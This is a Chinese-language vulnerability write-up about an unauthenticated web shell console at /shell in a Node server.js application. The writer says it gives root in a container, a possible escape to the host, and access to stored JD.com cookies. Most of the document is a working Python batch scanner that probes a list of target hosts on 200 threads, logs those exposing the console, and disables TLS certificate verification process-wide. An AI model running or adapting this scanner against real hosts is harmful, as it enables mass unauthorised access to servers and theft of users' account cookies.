0x01 漏洞檢測
漏洞payload: http://IP/shell
0x02 漏洞驗證
在server.js代碼中, 使用了在線的shell控制臺, 該控制臺未進行鑒權, 導致存在未授權訪問

通過該漏洞獲取容器中的root權限, 可通過容器逃逸獲取宿主機權限

讀取的京東cookie

以下為批量腳本, 代碼比較粗糙,大佬勿噴
# -*- coding: utf-8 -*-
# @Time : 2021/6/30 9:07
# @Author : AD鈣奶
import json
import re
import time
import requests
import ssl
import threadpool
from loguru import logger
# Process-wide: silence urllib3's InsecureRequestWarning and make the default
# HTTPS context skip certificate verification. This affects every TLS
# connection this interpreter opens, not just the scan below, so hosts with
# forged or self-signed certificates are accepted without complaint.
try:
    requests.packages.urllib3.disable_warnings()
    unverified_ctx = ssl._create_unverified_context
except AttributeError:
    # Interpreter lacks the private helper (or the urllib3 shim): leave the
    # default, verifying context in place.
    pass
else:
    ssl._create_default_https_context = unverified_ctx
def brute_force(_url):
    """Probe one host for the unauthenticated /shell console and record a hit.

    Args:
        _url: base URL (scheme + host[:port]); the literal path '/shell' is
            appended to it.

    A response with status 200 *and* a Set-Cookie header is treated as a
    positive: it is appended to the day's result file via save_vuln() and
    logged. Every exception -- connection errors, the 20 s timeout, and the
    KeyError raised when Set-Cookie is absent -- is swallowed, so a host that
    is down, patched, or simply quiet produces no output at all.

    Detection note: on the wire this is a single GET /shell carrying a
    browser-like User-Agent and an empty Cookie header.
    """
    target = _url + '/shell'
    # Browser-style headers; the empty Cookie header models a first,
    # unauthenticated visit to the console.
    request_headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
        "Cache-Control": "max-age=0",
        "Connection": "keep-alive",
        "Cookie": "",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59",
    }
    try:
        response = requests.get(url=target, headers=request_headers, timeout=20)
        # headers['Set-Cookie'] raises KeyError when absent; that KeyError is
        # caught below, which is what makes "no cookie" count as a miss.
        is_hit = response.status_code == 200 and response.headers['Set-Cookie']
        if not is_hit:
            return
        message = f"系統(tǒng)存在未授權(quán)漏洞,存在漏洞的網(wǎng)站: {target}"
        # One result file per calendar day.
        result_file = time.strftime("%Y-%m-%d-") + 'vuln_存在未授權(quán).txt'
        save_vuln(result_file, message)
        logger.info(message)
    except Exception:
        # Deliberate best-effort: any failure on this host is ignored.
        pass
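def save_vuln(filename, info1):
    """Append one result line to ./result/<filename>.

    Args:
        filename: name of the file inside the ./result directory. It is
            concatenated onto the directory prefix without sanitisation; the
            only caller in this file passes a fixed strftime-derived name.
        info1: text to record; a trailing newline is added.

    Creates ./result on first use (the original assumed it already existed and
    raised FileNotFoundError otherwise) and writes UTF-8 explicitly so the
    non-ASCII messages do not depend on the locale's default encoding.
    """
    import os  # local import: keeps the file's top-level import block unchanged

    file_path = './result/' + filename
    os.makedirs(os.path.dirname(file_path), exist_ok=True)
    with open(file_path, "a", encoding="utf-8") as f:
        f.write(info1 + '\n')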
def open_file():
    """Load target URLs from url3.txt in the current directory, one per line.

    Returns:
        list[str]: each non-blank line with surrounding whitespace removed,
        in file order. Blank or whitespace-only lines are dropped.
    """
    with open("url3.txt", 'r', encoding='UTF-8') as fh:
        raw_lines = fh.readlines()
    targets = []
    for line in raw_lines:
        cleaned = line.strip()
        if line and cleaned:
            targets.append(cleaned)
    return targets
def main():
    """Read the target list and run brute_force() over it on a 200-worker pool.

    Blocks until every queued request has finished. `threadpool` is a
    third-party package; makeRequests() wraps each target in a WorkRequest
    that calls brute_force(target).
    """
    targets = open_file()
    workers = threadpool.ThreadPool(200)
    for work_item in threadpool.makeRequests(brute_force, targets):
        workers.putRequest(work_item)
    workers.wait()
# Script entry point: only runs when executed directly, not on import.
if __name__ == '__main__':
    main()